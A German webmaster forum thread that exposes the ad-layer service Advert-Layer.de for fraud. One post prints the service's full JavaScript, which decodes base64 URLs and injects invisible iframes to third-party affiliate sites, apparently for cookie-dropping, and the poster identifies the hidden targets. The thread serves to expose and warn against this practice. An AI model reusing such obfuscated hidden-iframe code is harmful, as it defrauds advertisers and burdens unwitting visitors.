Advert-Layer.de - ruft Bettellinks als Grafik auf

[aukweb]

eben war ich auf eine seite die auch den layer im einsatz hat,
da wird ja wirklich immernoch eine menge mitgeladen.
wirklich schade eigentlich.

nicht das nur die werbung geladen wird die man da sieht, nein
bei mir wurden eben bestimmt so 30 aktuelle partnerprogramme von
Zanox, affili, usw. im hintergrund mitgeladen und einige bettellinks.

das hat bestimmt auch was mit seinem adserver zu tun, wo die ausgelieferte
werbung dann als cookie abgespeichert und danach für eine gewisse zeit
gebblockt wird.
diesen adservercode hat er mit sicherheit auf vielen (anderen) seiten
eingesetzt und verteilt
und läd diese seiten nun stattdessen immer unsichtbar mit.


also nicht wie vorher
immer die bettellinks oder die werbung unsichtbar, nein
jetzt andere seiten unsichtbar, wo dort dann die bettellinks oder
auch die werbung abgebaut wird.

und als ob es noch nicht reicht werden
diese seiten nun nicht einzelln unsichtbar im Layer eingebunden, sondern
wenns geht am besten gleich alle auf einmal.

was soll man da sagen?
so welche leute ändern sich anscheint nie.

 

[Pikru]

BALDIRO.de (ehemals weltcity.com) verbietet Werbekampagnen mit Advert-Layer.de

Da kann ich meinem Vorredner nur zustimmen.

Auf weltcity.com wurde soeben ein Verbot durch gesetzt, was schon lange von einigen Webmastern gewünscht wurde, die unsere Werbung nutzen.

Alle Webseiten, die den Layeranbieter nutzen und Ihre Webseite bei uns bewerben wollen, dürfen dies nicht mehr. Damit die Browser der User wieder durchatmen können.

(Einige Netzwerkanbieter haben zugesagt, nach zuziehen. Bei denen, die es weiterhin zulassen, zählt sicherlich nur die Quantität, aber nicht die Qualität, der vermarkteten Webseiten!)

 

[rico02828]

Hallo,

ich habe mich mit Werben4Lose.de und Megapaid.de weltcity angeschlossen.

Ich hoffe das noch sehr viele da mitziehen.

Gruß Rico

 

[umweltpolizeisb]

Moin zusammen,

habt ihr denn mal den aktuellen Code euch angeschaut?

Da ich letztens nochmal testweise bei A-L eine Werbebuchung startete und mich der Admin daraufhin per ICQ nochmal angesprochen hatte (stand vorher immer gut mit ihm im Kontakt, bis halt diese Machenschaften aufgefolgen sind), wo er mir versicherte, dass er von diesen versteckten Frames definitiv nichts wusste, sondern von seinem damaligen Partnern war.

Da ich aber noch skeptisch war, ob das wirklich stimmt, wollte ich schauen, ob ich ihm jetzt wieder vertrauen kann und hatte Gremlin per PN gebeten, den aktuellen Code mal zu durchscannen.... und es kam heraus, dass die versteckten Frames zu dem Zeitpunkt definitiv nicht mehr vorhanden waren.

Gerne kann das Gremlin nochmal überprüfen und hier bestätigen... ich habe jedenfalls mein Vertrauen in die Seite wiedergefunden, da ich dort mit meinen Werbebuchungen großen Erfolg zu verzeichnen habe.

@mirror: Sorry, wenn ich das jetzt hier so schreibe, aber ich denke (auch wenn du dich dazu nicht hier äußern willst), dass ich zumindest meine Erkenntnisse hier darlege und ich am Anfang des Gesprächs auch noch skeptisch war.

Grüße!

 

[27o8]

Aktuell ist der Code wirklich sauber (soweit ich das beurteilen kann), kann natürlich sein, dass nun andere Praktiken angewendet werden. Ich persönlich halte jedoch auch Abstand von der Seite, denn wer einmal betrügt...

 

[27o8]

Genau 1 Monat später habe ich eine PN erhalten weil jemandem der Code auffällig vorgekommen ist! Ich habe daraufhin den Code wieder einmal überprüft und siehe da:

var keyStr='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
var tr1=new Array(); var tr2=new Array();
function utf8_decode(utftext) {
var string = ''; var i = 0; var c = c1 = c2 = 0; while ( i < utftext.length ) {
c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; }
else if((c > 191) && (c < 224)) { c2 = utftext.charCodeAt(i+1);
string += String.fromCharCode(((c & 31) << 6) | (c2 & 63)); i += 2; } else { c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2); string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3; } } return string; } function as2ed30cbf227d5b86af61b9073bed994630fb8e09(input){ var bits; var decOut = ''; var i = 0;
var output = ''; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ''); while (i < input.length) {
enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1);
if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } return output; }
var asXb353675cfde71aa8114580a2acb39a075bd51760 = 'DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KCSNidXR0b24geyBmbG9hdDog'+
'bGVmdDsgd2lkdGg6IDIwcHg7IGhlaWdodDogMjRweDsgei1pbmRleDogOTk5'+
'OyB9DQoJI3dlcmJ1bmcgeyBvdmVyZmxvdzogYXV0bzsgY29sb3I6ICMzYzNj'+
'M2M7IGZvbnQtc2l6ZTogMTFweDsgZm9udC1mYW1pbHk6IGFyaWFsOyB9DQo8'+
'L3N0eWxlPg0KPGRpdiBpZD0ibGF5ZXJkaXYiIHN0eWxlPSJwb3NpdGlvbjog'+
'YWJzb2x1dGU7IHdpZHRoOiA4MDBweDsgdG9wOiAyMHB4OyBsZWZ0OiAyMHB4'+
'OyB6LWluZGV4OiAxMDAwMDA7IGRpc3BsYXk6IG5vbmU7IGJvcmRlcjogMHB4'+
'OyBib3JkZXItbGVmdDogMXB4IHNvbGlkICNhZGFkYWQ7IGJvcmRlci1ib3R0'+
'b206IDFweCBzb2xpZCAjYWRhZGFkOyBib3JkZXItcmlnaHQ6IDFweCBzb2xp'+
'ZCAjYWRhZGFkOyBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOyBtYXJnaW46IDFw'+
'eDsiPg0KCTxkaXYgc3R5bGU9IndpZHRoOiA3OThweDsgYm9yZGVyOiAxcHgg'+
'c29saWQgI2ZmZjsgYm9yZGVyLXRvcDoxcHggc29saWQgI2FkYWRhZDsgaGVp'+
'Z2h0OiA0OTBweDsgei1pbmRleDogMTAwMDAwOyI+DQoJCTxkaXYgc3R5bGU9'+
'InotaW5kZXg6IDEwMDAwMTsgaGVpZ2h0OiAyNHB4OyB3aWR0aDogNzk4cHg7'+
'IG1hcmdpbi1ib3R0b206IDFweDsgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZm'+
'ZjsgYm9yZGVyLWJvdHRvbTogMXB4IHNvbGlkICNiNTMwMjY7ICI+DQoJCQk8'+
'ZGl2IHN0eWxlPSJ3aWR0aDogNzc0cHg7IGhlaWdodDogMjJweDsgZmxvYXQ6'+
'bGVmdDsgei1pbmRleDogMTAwMDAyOyBwYWRkaW5nLXRvcDo0cHg7ICI+DQoJ'+
'CQkJICA8c3BhbiBpZD0id2VyYnVuZyI+Jm5ic3A7PGI+VGlwcDo8L2I+IDxh'+
'IGhyZWY9Imh0dHA6Ly9hZHZlcnQtbGF5ZXIuZGUvY2wrTnpJeS5odG1sIiB0'+
'YXJnZXQ9Il9ibGFuayIgc3R5bGU9ImZvbnQtc2l6ZToxMXB4OyBmb250LWZh'+
'bWlseTogYXJpYWw7IGNvbG9yOiNiNTMwMjY7IHRleHQtZGVjb3JhdGlvbjog'+
'bm9uZTsgZm9udC13ZWlnaHQ6IG5vcm1hbDsiPkxheWVyIFNlcnZpY2UgYnkg'+
'QWR2ZXJ0LUxheWVyLmRlIC0gQmlzIHp1IDEwLjAwMCBMb3NlIHBybyBMYXll'+
'ciBBdWZydWYgLSBKZXR6dCBhbm1lbGRlbiB1bmQgbWl0IHZlcmRpZW5lbiE8'+
'L2E+PC9zcGFuPg0KCQkJPC9kaXY+DQoJCQk8ZGl2IGlkPSJidXR0b24iID48'+
'YSBocmVmPSIjIiBvbmNsaWNrPSJyZXR1cm4gX0xheWVyQ2xvc2UoKTsiID48'+
'aW1nIHN0eWxlPSJtYXJnaW4tdG9wOjVweDsiIHNyYz0iaHR0cDovL3ZpZXcu'+
'YWR2ZXJ0LWxheWVyLmRlL2ltYWdlcy9jcm9zcy5wbmciIGlkPSJidXQiIGFs'+
'dD0iTGF5ZXIgc2NobGllc2VuIiBib3JkZXI9IjAiPjwvYT48L2Rpdj4NCiAg'+
'ICAgICAgICAgICAgICA8L2Rpdj4NCgkJPGRpdiBzdHlsZT0iaGVpZ2h0OiA0'+
'NjVweDsgd2lkdGg6Nzk4cHg7IHBhZGRpbmc6IDBweDsgY2xlYXI6IGJvdGg7'+
'IHotaW5kZXg6IDEwMDAwNTsiPg0KCQkJPGlmcmFtZSBuYW1lPSJsYXllcmlm'+
'cmFtZSIgaWQ9ImxheWVyaWZyYW1lX2lkIiBzcmM9IiIgZnJhbWVib3JkZXI9'+
'IjAiIHdpZHRoPSIxMDAlIiBoZWlnaHQ9IjEwMCUiIHNjcm9sbGluZz0ibm8i'+
'PjwvaWZyYW1lPg0KCQk8L2Rpdj4NCgk8L2Rpdj48aHI+DQogICAgICAgIDxk'+
'aXYgc3R5bGU9InRleHQtYWxpZ246Y2VudGVyOyI+PGlmcmFtZSBzcmM9Imh0'+
'dHA6Ly92aWV3LmFkdmVydC1sYXllci5kZS9hZHMvZmExLnBocD91bmlxPTE5'+
'NjIwNjUxJnJhbmRvbT0yMDk2MGY2ZmMyZjM0ZTU0NzdjMzUyMTQ1ODM3NmE5'+
'NWFlZTE4NzQ5IiB3aWR0aD0iNzI4IiBoZWlnaHQ9IjkwIiBzY3JvbGxpbmc9'+
'Im5vIiBmcmFtZWJvcmRlcj0iMCI+PC9pZnJhbWU+PC9kaXY+DQo8L2Rpdj4NCiAgICA=';
 document.write(as2ed30cbf227d5b86af61b9073bed994630fb8e09(asXb353675cfde71aa8114580a2acb39a075bd51760));

var _Element = new Array();
var links;

function _GetTopElement() {
thebody = document.getElementsByTagName('div');

if(thebody.length > 0) {
return document; }
else {
return document.parentElement; }
}

function _LayerMove(links) {
layer_rand.style.display = 'block';
links += 60;
layer_rand.style.left = links + "px";

if (links < 11){
setTimeout("_LayerMove("+links+")", 15);
}
}

function _GetLeft(fal) {
if (fal.offsetParent) {
return (fal.offsetLeft + _GetLeft(fal.offsetParent)); }
else {
return (fal.offsetLeft); }
}

function _GetTop(fal) {
if (fal.offsetParent) {
return (fal.offsetTop + _GetTop(fal.offsetParent)); }
else {
return (fal.offsetTop); }
}tr2[0] = 'aHR0cDovL2Fub255bS50by8/aHR0cDovL2RlaW5ib251czI0LmRl';
tr2[1] = 'aHR0cDovL2NyaWJpdC5kZS9mb2xsb3cucGhwP3JlZnJlc2g9MTA=';

function _LayerClose() {
_HideAnimation('10');
(new Image()).src =  'https://view.advert-layer.de/ad1_click.php?l=0&campain=431&code=722&z=1290704868&sec=c78945e19348e32971276c79d89dd49a00a7eb8e&la=DE';
open('https://view.advert-layer.de/ad.php?url=aHR0cDovL2tsaWNrLmFmZmlsaXdlbHQubmV0L2tsaWNrLnBocD9iYW5uZXJpZD00NDI1MiZwaWQ9MzA0MzAmcHJpZD0yNTE4JnN1YmlkPTcyMg==&c=0a8a52739f92395312a7cb1ad181c0a8fbc5a80f' , '', 'menubar=no,toolbar=no,resizable=yes,location=yes,scrollbars=yes,status=yes');
self.focus();
return false;
}

function _HideAnimation(left) {
if(left > -800) {
left -= 200; layer_rand.style.left = left; setTimeout("_HideAnimation(" + left + ")", 50);
}  else { layer_rand.style.display = 'none'; layer_rand.style.left = '-2000'; layer_rand.style.top = '-2000';
}
}
for(i=0;i<tr1.length;i++){
    (new Image()).src = as2ed30cbf227d5b86af61b9073bed994630fb8e09(tr1[i]);
}
for(x=0;x<tr2.length;x++){
    var tr= document.createElement('iframe');
    tr.src = as2ed30cbf227d5b86af61b9073bed994630fb8e09(tr2[x]);
    tr.style.display = 'none';
    document.body.appendChild(tr);
}
    
function _Update() {
if(document.all) {
if (document.documentElement && document.documentElement.scrollTop) {
_Pos = document.documentElement.scrollTop }
else if (document.body) {
_Pos = document.body.scrollTop }
layer_rand.style.top = _Pos + 10 + 'px'; setTimeout("_Update()", 1); }
else {
layer_rand.style.position = 'fixed'; }
}

function _StartAd() {
document.getElementById("layeriframe_id").src = 'https://view.advert-layer.de/ad.php?url=aHR0cDovL2tsaWNrLmFmZmlsaXdlbHQubmV0L2tsaWNrLnBocD9iYW5uZXJpZD00NDI1MiZwaWQ9MzA0MzAmcHJpZD0yNTE4JnN1YmlkPTcyMg==&c=0a8a52739f92395312a7cb1ad181c0a8fbc5a80f';
_Update();
setTimeout("_LayerMove(-990)", 3000);
}



if(screen.availWidth > 800) {
width = '800'; }
else { width = '700'; }

var layer_rand = document.getElementById('layerdiv'); 

_StartAd();

Zeile 95 und 96 werden die beiden Seiten definiert und Zeile 115-119 werden die entsprechenden Zeilen angelegt.

Diese beiden Seiten werden aktuell versteckt in einem iframe geladen:
https://anonym.to/?https://deinbonus24.de (= https://deinbonus24.de)
https://cribit.de/follow.php?refresh=10 (= https://filmgewinn.de/)

So viel zu dem tollen Gespräch was der Admin von advert-layer vor einiger Zeit mit mir in ICQ hatte. Er hat sich richtig beschwert, dass ich solche Lügen verbreiten würde über seinen Dienst und mir versichert, dass er sowas nicht mehr macht naja man sieht es ja.

Und für Dumm hält er uns ja auch noch:
https://view.advert-layer.de/ad1_588js die Datei welche wir bislang überprüft haben ist clean.

Nun wurde mir folgende Datei zugeschickt:
https://view.advert-layer.de/ad1_722.js

Und dort befindet sich der Code nachweislich drin (habs extra wieder mehreren Personen gezeigt)

 

[EselDompteur]

auch bei HPLose ist es auffällig, das einige Kampagnen, die sonst immer sehr moderat in der Anzahl Ihrer Frames gewesen sind plötzlich nach oben schnellen, und es auch vermehrt zu Abusemeldungen kommt.
Prüft man diese Seiten, so ist immer ein Advert-Layer direkt oder indirekt zu finden. Es widerstrebt mir eigentlich mit Blockaden gegen einen Mitbewerber vor zu gehen, aber wir werden bei HPLose und Forced-Lose uns dazu durchringen, wenn dieser Umstand weiterhin anhält. Es kann nicht sein, das User und Sponsoren mit solchen Mitteln drangsaliert werden ...

 

[Muecke]

hmm. irgendwie habe ich darauf schon gewartet wann es wieder so weit ist.
ich hoffe dieses mal werden die Webmaster mal dementsprechend handeln und diesen Anbieter entfernen und somit auch die User evrschonen.

LG Muecke : >

 

[EselDompteur]

edit: gehört hier nicht hin

 

[Chriz9]

Edit:Gehört hier nicht hin..

 

[27o8]

Edit:Gehört hier nicht hin..

edit: gehört hier nicht hin

Hab ich was verpasst?

 

[EselDompteur]

Nein ... mein Beitrag bezog sich auf Muecke, und war OT, daher hab ich den wieder herauseditiert ...

 

[AEV-Panther]

Gibt es dazu eigentlich inzwischen irgendwelche Neuigkeiten, ob der Code nun Clean ist oder ob weiter geschummelt wird?

Habe den Code neu auf meine Seite eingefügt und wurde hier auf den Thread aufmerksam gemacht!

 

[27o8]

Habe zwischenzeitlich immer mal wieder überprüft ob der Code drin ist (Wenn ich von Usern gefragt wurde). Dort war der Code immer Clean. Es gibt natürlich auch andere Möglichkeiten wie man paar Cookies streuen kann wo es nicht so doll auffällt.

Zum Beispiel in dem man das ganze begrenzt (5k AUfrufe am Tag oders) oder nur bei bestimmten Webseiten anzeigen lässt etc. etc.

 

[maxi888]

Beide user 0 Klammern bekommen. Abgezockt! Wenn die ganz viele aber wenigstens sichtbare iframes benutzt hätten wäre es noch ok aber sowas ist wirklick unverschämt.

 

[AEV-Panther]

Beide user 0 Klammern bekommen. Abgezockt! Wenn die ganz viele aber wenigstens sichtbare iframes benutzt hätten wäre es noch ok aber sowas ist wirklick unverschämt.

Hä??? die haben das ja abgestellt und derzeit kann ein solches erneutes falsches Verhalten nicht nachgewiesen werden! Der letzte Beitrag war 5 Monate her

 

[geld-macht-geil]

Zahlt er eigentlich seine User überhaupt aus?

 

[umweltpolizeisb]

Zahlt er eigentlich seine User überhaupt aus?

Ja, es gibt sogar inzwischen eine Premium-AZ-Funktion, wo deine Auszahlung innerhalb von 5 Minuten eintrifft...

Grüße!

 

[geld-macht-geil]

Betrügt er im Layer mit iframes noch?

 

[umweltpolizeisb]

Betrügt er im Layer mit iframes noch?

Es gibt bis jetzt keinerlei Informationen, dass Cookie-Dropping über Advert-Layer eingestellt worden ist.
Ist aber auch letztendlich nicht die einzigste Seite, die das betreibt.

Grüße!